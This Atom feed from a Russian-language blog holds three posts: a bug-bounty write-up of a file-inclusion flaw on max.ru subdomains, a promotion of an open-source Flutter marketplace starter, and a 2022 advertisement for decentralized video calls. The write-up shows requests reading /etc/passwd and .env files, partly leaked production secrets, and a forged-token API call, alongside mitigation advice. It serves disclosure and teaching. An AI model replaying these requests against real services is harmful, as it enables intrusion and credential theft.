<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Dmitry Sorokin</title><subtitle>Making the world a better place! 🌎 403 Gone REChain, Inc Katya AI, Systems Katya, Inc Katya Systems, LLC REChain Network Solutions /* sorydima */</subtitle><author><name>Dmitry Sorokin</name></author><id>https://teletype.in/atom/sorydima</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/sorydima?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@sorydima?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=sorydima"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/sorydima?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-05-25T19:57:55.908Z</updated><entry><id>sorydima:maxru</id><link rel="alternate" type="text/html" href="https://teletype.in/@sorydima/maxru?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=sorydima"></link><title>🔍 От LFI до полной компрометации инфраструктуры — реальный кейс CVSS 9.0</title><published>2025-08-14T08:27:24.272Z</published><updated>2025-08-14T08:27:24.272Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/52/a5/52a5254c-b4ec-4d63-b6ef-b84256b6d884.png"></media:thumbnail><category term="informacionnaya-bezopasnost" label="Информационная безопасность"></category><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/11/bc/11bc6995-cfe4-441e-a65c-d22e55bcf239.jpeg&quot;&gt;В рамках одного из багбаунти-исследований мне удалось обнаружить и успешно эксплуатировать уязвимость Local File Inclusion (LFI) на поддоменах *.max.ru.
 Эта уязвимость дала возможность скачать конфигурационные файлы, получить критические секреты, подделать авторизационные токены и в итоге — полностью скомпрометировать API и инфраструктуру.</summary><content type="html">
  &lt;p id=&quot;DpXs&quot;&gt;В рамках одного из багбаунти-исследований мне удалось обнаружить и успешно эксплуатировать уязвимость &lt;strong&gt;Local File Inclusion (LFI)&lt;/strong&gt; на поддоменах &lt;code&gt;*.max.ru&lt;/code&gt;.&lt;br /&gt; Эта уязвимость дала возможность скачать конфигурационные файлы, получить критические секреты, подделать авторизационные токены и в итоге — полностью скомпрометировать API и инфраструктуру.&lt;/p&gt;
  &lt;p id=&quot;uc8N&quot;&gt;📺 &lt;strong&gt;Видео с PoC:&lt;/strong&gt; &lt;a href=&quot;https://youtu.be/ASeSyP0PTxg?si=s1p_BW9585zh5Q_q&quot; target=&quot;_blank&quot;&gt;YouTube&lt;/a&gt;&lt;br /&gt; 📂 &lt;strong&gt;Архив с доказательствами:&lt;/strong&gt; &lt;a href=&quot;https://disk.yandex.ru/d/TVwFseRPnOP8FA&quot; target=&quot;_blank&quot;&gt;Yandex Disk&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;5yzj&quot;&gt;1️⃣ Этап 1 — Рекогносцировка&lt;/h2&gt;
  &lt;p id=&quot;2MY2&quot;&gt;Начав с классического рекона, я искал &lt;strong&gt;параметры, которые могут работать с файловыми путями&lt;/strong&gt;.&lt;br /&gt; На поддоменах:&lt;/p&gt;
  &lt;ul id=&quot;eyq4&quot;&gt;
    &lt;li id=&quot;CaNs&quot;&gt;&lt;code&gt;business.max.ru&lt;/code&gt;&lt;/li&gt;
    &lt;li id=&quot;QQOh&quot;&gt;&lt;code&gt;help.max.ru&lt;/code&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;m9QI&quot;&gt;нашёл параметр &lt;code&gt;file&lt;/code&gt;, который явно подгружал файлы с сервера.&lt;/p&gt;
  &lt;p id=&quot;nkqT&quot;&gt;&lt;strong&gt;Тест-запрос:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;6xad&quot;&gt;GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*
&lt;/pre&gt;
  &lt;p id=&quot;wwnw&quot;&gt;&lt;strong&gt;Ответ (фрагмент):&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;gvQa&quot;&gt;root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
&lt;/pre&gt;
  &lt;p id=&quot;qkNy&quot;&gt;Вывод: &lt;strong&gt;нет фильтрации, нет валидации, полный LFI.&lt;/strong&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;zWIO&quot;&gt;2️⃣ Этап 2 — Поиск «золотых файлов»&lt;/h2&gt;
  &lt;p id=&quot;S06u&quot;&gt;После подтверждения LFI приоритет был очевиден — искать файлы, содержащие пароли, ключи и токены.&lt;/p&gt;
  &lt;p id=&quot;vQS8&quot;&gt;Файл Что хранит Чем опасен     &lt;code&gt;.env&lt;/code&gt; Переменные окружения JWT_SECRET, доступ к БД, API-ключи   &lt;code&gt;config.php&lt;/code&gt; Конфигурация PHP-приложения Подключение к БД   &lt;code&gt;.git/config&lt;/code&gt; Настройки git-репозитория URL и токены для приватных репо   &lt;code&gt;/proc/self/environ&lt;/code&gt; Переменные окружения процесса Runtime-секреты   &lt;code&gt;database.php&lt;/code&gt; Данные для подключения к БД Полный доступ к данным&lt;/p&gt;
  &lt;p id=&quot;Vjjz&quot;&gt;&lt;strong&gt;Запрос на .env:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;5j7Q&quot;&gt;GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*
&lt;/pre&gt;
  &lt;p id=&quot;nC0I&quot;&gt;&lt;strong&gt;Ответ (усечён):&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;PUI4&quot;&gt;APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...
&lt;/pre&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;uZ7f&quot;&gt;3️⃣ Этап 3 — Извлечение секретов&lt;/h2&gt;
  &lt;p id=&quot;3ZVW&quot;&gt;Из этих файлов были получены:&lt;/p&gt;
  &lt;ul id=&quot;dyyL&quot;&gt;
    &lt;li id=&quot;wnAX&quot;&gt;&lt;strong&gt;JWT_SECRET&lt;/strong&gt; — ключ подписи токенов авторизации&lt;/li&gt;
    &lt;li id=&quot;sUVd&quot;&gt;&lt;strong&gt;DB_USER / DB_PASSWORD&lt;/strong&gt; — доступ к продакшн-БД&lt;/li&gt;
    &lt;li id=&quot;2le4&quot;&gt;&lt;strong&gt;GitHub Token&lt;/strong&gt; — чтение и запись в приватные репозитории&lt;/li&gt;
    &lt;li id=&quot;2Vy0&quot;&gt;&lt;strong&gt;API Keys&lt;/strong&gt; — ключи к сторонним сервисам&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;HgR9&quot;&gt;4️⃣ Этап 4 — Эксплуатация JWT_SECRET&lt;/h2&gt;
  &lt;p id=&quot;erRg&quot;&gt;Секрет подписи JWT дал возможность:&lt;/p&gt;
  &lt;ol id=&quot;aveu&quot;&gt;
    &lt;li id=&quot;cmWO&quot;&gt;&lt;strong&gt;Подделывать токены&lt;/strong&gt; любого пользователя (включая админов)&lt;/li&gt;
    &lt;li id=&quot;OO7V&quot;&gt;&lt;strong&gt;Повторно использовать&lt;/strong&gt; (token replay) уже действующие токены&lt;/li&gt;
    &lt;li id=&quot;OyKm&quot;&gt;Получать доступ к приватным эндпоинтам API &lt;strong&gt;без логина и пароля&lt;/strong&gt;&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;pF7x&quot;&gt;&lt;strong&gt;PoC-запрос:&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;Hx9J&quot;&gt;curl -H &amp;quot;Authorization: Bearer forged_admin_token&amp;quot; \
     https://api.oneme.ru/api/user
&lt;/pre&gt;
  &lt;p id=&quot;8bU1&quot;&gt;&lt;strong&gt;Результат:&lt;/strong&gt;&lt;br /&gt; Ответ с приватными данными пользователя без прохождения авторизации.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;kOFI&quot;&gt;5️⃣ Этап 5 — Полная цепочка атаки&lt;/h2&gt;
  &lt;p id=&quot;1tDQ&quot;&gt;Сценарий выглядел так:&lt;/p&gt;
  &lt;ol id=&quot;sCyX&quot;&gt;
    &lt;li id=&quot;YuOE&quot;&gt;&lt;strong&gt;LFI&lt;/strong&gt; на &lt;code&gt;*.max.ru&lt;/code&gt; → доступ к &lt;code&gt;.env&lt;/code&gt;&lt;/li&gt;
    &lt;li id=&quot;nScC&quot;&gt;&lt;strong&gt;Извлечение JWT_SECRET&lt;/strong&gt; и других секретов&lt;/li&gt;
    &lt;li id=&quot;XjwH&quot;&gt;&lt;strong&gt;Форжинг токена&lt;/strong&gt; с правами администратора&lt;/li&gt;
    &lt;li id=&quot;1VUO&quot;&gt;&lt;strong&gt;Доступ к API&lt;/strong&gt; → просмотр, изменение, удаление данных&lt;/li&gt;
    &lt;li id=&quot;ZB5G&quot;&gt;&lt;strong&gt;GitHub Token&lt;/strong&gt; → скачивание приватного кода&lt;/li&gt;
    &lt;li id=&quot;absX&quot;&gt;Возможный &lt;strong&gt;доступ к внутренним сервисам&lt;/strong&gt; через API-ключи&lt;/li&gt;
  &lt;/ol&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;g5qK&quot;&gt;6️⃣ MITRE ATT&amp;amp;CK&lt;/h2&gt;
  &lt;ul id=&quot;4shL&quot;&gt;
    &lt;li id=&quot;QHxD&quot;&gt;&lt;strong&gt;T1005&lt;/strong&gt; — Data from Local System&lt;/li&gt;
    &lt;li id=&quot;SoSV&quot;&gt;&lt;strong&gt;T1552.001&lt;/strong&gt; — Unsecured Credentials: Environment Variables&lt;/li&gt;
    &lt;li id=&quot;9i79&quot;&gt;&lt;strong&gt;T1078&lt;/strong&gt; — Valid Accounts&lt;/li&gt;
    &lt;li id=&quot;r3eM&quot;&gt;&lt;strong&gt;T1550.003&lt;/strong&gt; — Use of Web Tokens&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;CTR7&quot;&gt;7️⃣ CVSS 3.1&lt;/h2&gt;
  &lt;p id=&quot;Vx8a&quot;&gt;&lt;strong&gt;Вектор:&lt;/strong&gt;&lt;br /&gt; &lt;code&gt;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&lt;/code&gt;&lt;br /&gt; &lt;strong&gt;Оценка:&lt;/strong&gt; &lt;strong&gt;9.0 (Critical)&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;CTKX&quot;&gt;
    &lt;li id=&quot;ve1u&quot;&gt;&lt;strong&gt;AV:N&lt;/strong&gt; — доступно по сети&lt;/li&gt;
    &lt;li id=&quot;IQe5&quot;&gt;&lt;strong&gt;AC:L&lt;/strong&gt; — низкая сложность&lt;/li&gt;
    &lt;li id=&quot;8IJf&quot;&gt;&lt;strong&gt;PR:N&lt;/strong&gt; — не требует авторизации&lt;/li&gt;
    &lt;li id=&quot;SI36&quot;&gt;&lt;strong&gt;UI:N&lt;/strong&gt; — не требует действий пользователя&lt;/li&gt;
    &lt;li id=&quot;SU8f&quot;&gt;&lt;strong&gt;S:C&lt;/strong&gt; — затрагивает другие компоненты&lt;/li&gt;
    &lt;li id=&quot;aGu8&quot;&gt;&lt;strong&gt;C:H/I:H/A:H&lt;/strong&gt; — критическое влияние на все параметры&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;ntY5&quot;&gt;8️⃣ Риски&lt;/h2&gt;
  &lt;ul id=&quot;YY41&quot;&gt;
    &lt;li id=&quot;eJ5m&quot;&gt;Полная компрометация API&lt;/li&gt;
    &lt;li id=&quot;TdwH&quot;&gt;Утечка критических секретов&lt;/li&gt;
    &lt;li id=&quot;QZYG&quot;&gt;Доступ к приватным репозиториям&lt;/li&gt;
    &lt;li id=&quot;Dm1P&quot;&gt;Возможные атаки на внутреннюю инфраструктуру&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;U0oB&quot;&gt;9️⃣ Рекомендации&lt;/h2&gt;
  &lt;ol id=&quot;eKnN&quot;&gt;
    &lt;li id=&quot;ir5e&quot;&gt;&lt;strong&gt;Фильтрация параметров&lt;/strong&gt; — белые списки путей, запрет абсолютных/относительных переходов.&lt;/li&gt;
    &lt;li id=&quot;J3bj&quot;&gt;&lt;strong&gt;Закрыть доступ к .env и config.php&lt;/strong&gt; на уровне веб-сервера.&lt;/li&gt;
    &lt;li id=&quot;VCqC&quot;&gt;&lt;strong&gt;Не хранить продакшн-секреты&lt;/strong&gt; в коде и окружении, доступном фронтенду.&lt;/li&gt;
    &lt;li id=&quot;NDov&quot;&gt;&lt;strong&gt;Регулярная ротация ключей и токенов&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;1aEy&quot;&gt;&lt;strong&gt;Мониторинг и алерты&lt;/strong&gt; по аномальной активности.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;HFWq&quot;&gt;10️⃣ Выводы для багхантеров&lt;/h2&gt;
  &lt;ul id=&quot;je6K&quot;&gt;
    &lt;li id=&quot;pHOG&quot;&gt;LFI часто недооценивают, но в реальности он может открыть все двери.&lt;/li&gt;
    &lt;li id=&quot;LoMB&quot;&gt;Первое, что проверяйте — &lt;code&gt;.env&lt;/code&gt;, &lt;code&gt;config.php&lt;/code&gt;, &lt;code&gt;.git/&lt;/code&gt;.&lt;/li&gt;
    &lt;li id=&quot;jvZk&quot;&gt;Один секрет (например, JWT_SECRET) = полный контроль над системой.&lt;/li&gt;
    &lt;li id=&quot;lhkd&quot;&gt;Думайте цепочками атак, а не отдельными багами.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;U4B3&quot;&gt;💡 &lt;strong&gt;Ключевая мысль:&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;8iLg&quot;&gt;Даже одна уязвимость низкого уровня, если её правильно развить, может обернуться катастрофой для бизнеса.&lt;/blockquote&gt;
  &lt;hr /&gt;

</content></entry><entry><id>sorydima:mymodusflutter</id><link rel="alternate" type="text/html" href="https://teletype.in/@sorydima/mymodusflutter?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=sorydima"></link><title>🚀 My Modus: Flutter + Dart стартер для интеграции с Wildberries, Ozon и La Moda</title><published>2025-08-09T15:19:52.604Z</published><updated>2025-08-09T15:19:52.604Z</updated><category term="startapy" label="Стартапы"></category><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/d5/1a/d51ac506-eabf-47db-b322-657a3b045c66.png&quot;&gt;Сегодня выигрывают те бренды, кто умеет продавать в нескольких каналах одновременно.
Мы разработали My Modus — готовое решение с открытым кодом, которое позволяет за несколько дней запустить приложение для управления продажами сразу на трёх крупнейших маркетплейсах: Wildberries, Ozon и La Moda.</summary><content type="html">
  &lt;p id=&quot;ebHo&quot;&gt;Сегодня выигрывают те бренды, кто умеет продавать в нескольких каналах одновременно.&lt;br /&gt;Мы разработали My Modus — готовое решение с открытым кодом, которое позволяет за несколько дней запустить приложение для управления продажами сразу на трёх крупнейших маркетплейсах: Wildberries, Ozon и La Moda.&lt;/p&gt;
  &lt;p id=&quot;EIv1&quot;&gt;📈 Зачем бренду интеграция с несколькими маркетплейсами&lt;/p&gt;
  &lt;p id=&quot;1FBd&quot;&gt;Онлайн-торговля давно вышла за рамки одного магазина.&lt;br /&gt;Присутствие на нескольких площадках:&lt;/p&gt;
  &lt;p id=&quot;jmw7&quot;&gt;Расширяет аудиторию — разные маркетплейсы привлекают разные сегменты покупателей.&lt;br /&gt;Увеличивает оборот — больше точек входа = больше продаж.&lt;br /&gt;Снижает риски — падение продаж на одной платформе компенсируется другими.&lt;/p&gt;
  &lt;p id=&quot;kndi&quot;&gt;Но у каждой платформы свой API, свой формат данных и требования. Мы решили эту проблему, создав единый мультиканальный e-commerce стартер на Flutter + Dart.&lt;/p&gt;
  &lt;p id=&quot;YJ0i&quot;&gt;🛠 Технологии и архитектура&lt;/p&gt;
  &lt;p id=&quot;D4wX&quot;&gt;Фронтенд (Flutter):&lt;/p&gt;
  &lt;p id=&quot;wtSF&quot;&gt;Web + Mobile (iOS, Android) из одного кода&lt;br /&gt;Мультиязычность (i18n)&lt;br /&gt;Навигация через GoRouter&lt;br /&gt;Адаптивный дизайн под любые устройства&lt;/p&gt;
  &lt;p id=&quot;gGgD&quot;&gt;Бэкенд (Dart Shelf):&lt;/p&gt;
  &lt;p id=&quot;JtDt&quot;&gt;Лёгкий и быстрый HTTP-сервер&lt;br /&gt;PostgreSQL&lt;br /&gt;JWT-аутентификация (dart_jsonwebtoken)&lt;br /&gt;Модуль интеграции с API маркетплейсов&lt;/p&gt;
  &lt;p id=&quot;s9Pk&quot;&gt;DevOps:&lt;/p&gt;
  &lt;p id=&quot;kxG5&quot;&gt;CI/CD через GitHub Actions&lt;br /&gt;Автодеплой фронтенда на GitHub Pages&lt;br /&gt;Автодеплой бэкенда на Render&lt;/p&gt;
  &lt;p id=&quot;II4x&quot;&gt;🔌 Интеграция с маркетплейсами&lt;/p&gt;
  &lt;p id=&quot;Sp6J&quot;&gt;1. Wildberries API&lt;/p&gt;
  &lt;p id=&quot;2fHy&quot;&gt;    Импорт каталога&lt;br /&gt;    Обновление остатков и цен&lt;br /&gt;    Управление заказами в реальном времени&lt;br /&gt;    Пример: [Wildberries — My Modus](https://www.wildberries.ru/brands/311036101-my-modus)&lt;/p&gt;
  &lt;p id=&quot;kxKL&quot;&gt;2. Ozon API&lt;/p&gt;
  &lt;p id=&quot;FPha&quot;&gt;    Автоматическая публикация товаров&lt;br /&gt;    Синхронизация описаний и изображений&lt;br /&gt;    Контроль логистики и доставки&lt;/p&gt;
  &lt;p id=&quot;PNHE&quot;&gt;3. La Moda API&lt;/p&gt;
  &lt;p id=&quot;a2aX&quot;&gt;    Загрузка fashion-коллекций&lt;br /&gt;    Поддержка сезонных релизов&lt;br /&gt;    Пример: [La Moda — My Modus](https://www.lamoda.ru/cb/355-34325/clothes-zhenskaya-odezhda-mymodusfashion)&lt;/p&gt;
  &lt;p id=&quot;nXZR&quot;&gt;💡 Почему Flutter + Dart&lt;/p&gt;
  &lt;p id=&quot;k8Ck&quot;&gt;Один язык для фронтенда и бэкенда&lt;br /&gt;Flutter даёт нативную скорость на iOS, Android и Web&lt;br /&gt;Shelf — минималистичный, быстрый и легко расширяемый сервер&lt;br /&gt;Меньше времени на разработку, проще поддержка&lt;/p&gt;
  &lt;p id=&quot;jiYf&quot;&gt;👥 Для кого этот проект&lt;/p&gt;
  &lt;p id=&quot;xNXD&quot;&gt;Fashion-бренды — подключение нескольких маркетплейсов из одного приложения&lt;br /&gt;Агентства — быстрый запуск e-commerce решений для клиентов&lt;br /&gt;Разработчики — готовый стартер, который можно дополнять и расширять&lt;/p&gt;
  &lt;p id=&quot;MYYg&quot;&gt;🚀 Как начать&lt;/p&gt;
  &lt;p id=&quot;vWVi&quot;&gt;Проект My Modus открыт на GitHub:&lt;br /&gt;🔗 https://github.com/sorydima/MyModusFlutter&lt;/p&gt;
  &lt;p id=&quot;pp7M&quot;&gt;Можно:&lt;/p&gt;
  &lt;p id=&quot;l8ys&quot;&gt;Форкнуть репозиторий&lt;br /&gt;Добавить новые маркетплейсы (AliExpress, Avito, Яндекс.Маркет)&lt;br /&gt;Внести улучшения через Pull Request&lt;/p&gt;

</content></entry><entry><id>sorydima:bWHHoUy00pD</id><link rel="alternate" type="text/html" href="https://teletype.in/@sorydima/bWHHoUy00pD?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=sorydima"></link><title>Звонки через Катю 👽 и платформу REChain 🪐: шифрование, пространственный звук, режим рации и многое другое!</title><published>2022-07-26T12:45:21.050Z</published><updated>2022-07-26T16:21:34.249Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/7f/9b/7f9bd24e-b8b2-4755-a647-28200d44d3e3.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/3c/f3/3cf3e68e-679c-4fdd-af58-d135a4012592.png&quot;&gt;Надеюсь, в 2022 году личные встречи станут намного проще, но потребность в видеозвонках по-прежнему существует, так что давайте посмотрим правде в глаза: они останутся здесь навсегда. Поэтому очень интересно представить первые в мире децентрализованные приложения для голосовой и видеоконференцсвязи, полностью работающие на базе Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network!</summary><content type="html">
  &lt;figure id=&quot;nmw7&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/3c/f3/3cf3e68e-679c-4fdd-af58-d135a4012592.png&quot; width=&quot;2880&quot; /&gt;
    &lt;figcaption&gt;REChain &lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;rwzi&quot;&gt;Надеюсь, в 2022 году личные встречи станут намного проще, но потребность в видеозвонках по-прежнему существует, так что давайте посмотрим правде в глаза: они останутся здесь навсегда. Поэтому очень интересно представить первые в мире &lt;strong&gt;&lt;em&gt;децентрализованные&lt;/em&gt;&lt;/strong&gt; приложения для голосовой и видеоконференцсвязи, полностью работающие на базе &lt;a href=&quot;http://matrix.katya.wtf&quot; target=&quot;_blank&quot;&gt;Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network!&lt;/a&gt;&lt;/p&gt;
  &lt;h2 id=&quot;I2AB&quot;&gt;Видеозалы&lt;/h2&gt;
  &lt;figure id=&quot;UulN&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2f/ef/2fefde7a-ce12-432a-a679-4e8645a3f31d.jpeg&quot; width=&quot;3000&quot; /&gt;
    &lt;figcaption&gt;Просто демо-образец iPad Pro в магазине Re-Store &lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;RdzJ&quot;&gt;Мы долго ждали этого момента, и, честно говоря, мы очень рады представить вам &lt;strong&gt;видеозалы&lt;/strong&gt;. Это важный шаг на пути к более богатым видео (а вскоре и голосовым) комнатам!&lt;/p&gt;
  &lt;p id=&quot;lGq5&quot;&gt;&lt;em&gt;&lt;u&gt;Вот несколько способов его использования:&lt;/u&gt;&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;WenT&quot; data-align=&quot;center&quot;&gt;&lt;em&gt;&lt;strong&gt;✅ Новый способ общения с группами людей для более непринужденных чатов в ваших сообществах 🥹&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;e00Y&quot; data-align=&quot;center&quot;&gt;&lt;em&gt;&lt;strong&gt;✅ Больше обсуждений водяного охладителя на работе 🤣&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;GPVZ&quot; data-align=&quot;center&quot;&gt;&lt;em&gt;&lt;strong&gt;✅ Интересный способ пообщаться с друзьями 😎&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;ORWL&quot;&gt;Так что же можно сделать?&lt;/h2&gt;
  &lt;p id=&quot;TV14&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;pZwG&quot;&gt;&lt;strong&gt;Полная свобода&lt;/strong&gt; - перетаскивайте участников по кругу, чтобы упорядочить их точно так, как вам нравится, или дважды щелкните, чтобы увеличить масштаб. Супер веселый и интерактивный способ поставить ваших абонентов на место : D&lt;/p&gt;
  &lt;p id=&quot;deht&quot;&gt;&lt;strong&gt;Спотлайт&lt;/strong&gt; - в качестве альтернативы, позвольте приложению помочь вам управлять вызовом в зависимости от того, кто в данный момент говорит!&lt;/p&gt;
  &lt;p id=&quot;A4ZY&quot;&gt;&lt;strong&gt;Фулл саппорт&lt;/strong&gt; - мессенджеры &lt;a href=&quot;http://katya.wtf&quot; target=&quot;_blank&quot;&gt;Катя 👽&lt;/a&gt; и &lt;a href=&quot;http://rechain.online&quot; target=&quot;_blank&quot;&gt;REChain 🪐&lt;/a&gt; &lt;strong&gt;&lt;em&gt;бесплатны&lt;/em&gt;&lt;/strong&gt; и доступны для загрузки на &lt;strong&gt;&lt;em&gt;Android, iOS, macOS, Windows, Linux, Chrome OS, Google Wear OS, &lt;/em&gt;&lt;/strong&gt;некоторые модели &lt;strong&gt;&lt;em&gt;Smart TV,&lt;/em&gt;&lt;/strong&gt; часть умных девайсов &lt;strong&gt;&lt;em&gt;IoT,&lt;/em&gt;&lt;/strong&gt; а также на любом устройстве в любом браузере в виде &lt;strong&gt;&lt;em&gt;PWA&lt;/em&gt;&lt;/strong&gt; веб-приложения! &lt;em&gt;(Катя пока недоступна для браузеров, однако PWA-приложение Кати готовится к релизу)&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;avwt&quot;&gt;&lt;strong&gt;Вызов по ссылке&lt;/strong&gt; - просто поделитесь ссылкой и вперед!&lt;/p&gt;
  &lt;p id=&quot;VPAM&quot;&gt;&lt;strong&gt;Гостевые конференции&lt;/strong&gt; - нет необходимости регистрировать учетную запись, чтобы присоединиться к конференции!&lt;/p&gt;
  &lt;p id=&quot;q5sU&quot;&gt;&lt;strong&gt;Создание скриншотов&lt;/strong&gt; - несколько пользователей могут делиться ими одновременно!&lt;/p&gt;
  &lt;p id=&quot;RYrI&quot;&gt;&lt;strong&gt;Встроенная матричная конференц-связь (MSC3401)&lt;/strong&gt; - полностью децентрализована; общайтесь с кем угодно в любом месте сети &lt;a href=&quot;http://matrix.katya.wtf&quot; target=&quot;_blank&quot;&gt;Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network&lt;/a&gt; &lt;strong&gt;&lt;em&gt;без какой-либо единой точки отказа, контроля или сбоя!&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;h2 id=&quot;L9w0&quot;&gt;Как это работает?&lt;/h2&gt;
  &lt;figure id=&quot;2WpV&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d6/d0/d6d07c16-be04-48c4-b352-37e3ff76d9b9.png&quot; width=&quot;2880&quot; /&gt;
    &lt;figcaption&gt;Катя &lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4GEv&quot;&gt;&lt;strong&gt;&lt;em&gt;Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network&lt;/em&gt;&lt;/strong&gt; - это головная реализация собственной &lt;strong&gt;&lt;em&gt;голосовой/видеоконференцсвязи&lt;/em&gt;&lt;/strong&gt; на основе матрицы, как определено в предложении по изменению спецификации матрицы &lt;strong&gt;&lt;em&gt;MSC3401&lt;/em&gt;&lt;/strong&gt;. Это пошаговое изменение в том, как работает VoIP в сети - расширение нашей матрицы VoIP/видеозвонков 1:1 для поддержки нескольких участников и значительное ускорение настройки вызова за счет переключения &lt;strong&gt;&lt;em&gt;transport layers&lt;/em&gt;&lt;/strong&gt;. Если вы хотите знать, что происходит под капотом, ознакомьтесь с &lt;strong&gt;&lt;em&gt;докладом Мэтью на CommCon 2021&lt;/em&gt;&lt;/strong&gt; о распространении вызовов E2EE на многопоточность, чтобы узнать кровавые подробности! 🤓 🤣&lt;/p&gt;
  &lt;p id=&quot;thdi&quot;&gt;&lt;em&gt;Мы будем рады услышать от вас о том, как вы использовали наши приложения, что вам нравится, какие у вас были проблемы и функции, которые вы хотели бы видеть в будущем!&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;o055&quot;&gt;&lt;em&gt;С уважением,&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;PdRo&quot;&gt;&lt;em&gt;Дмитрий Сорокин,&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;hY3m&quot;&gt;&lt;strong&gt;403 Gone&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;j8FF&quot;&gt;&lt;strong&gt;REChain, Inc&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;n3t7&quot;&gt;&lt;strong&gt;Katya AI, Systems&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;9Pvw&quot;&gt;&lt;strong&gt;Katya, Inc&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;MIiw&quot;&gt;&lt;strong&gt;Katya Systems, LLC&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;4qO5&quot;&gt;&lt;strong&gt;REChain Network Solutions&lt;/strong&gt;&lt;/p&gt;

</content></entry></feed>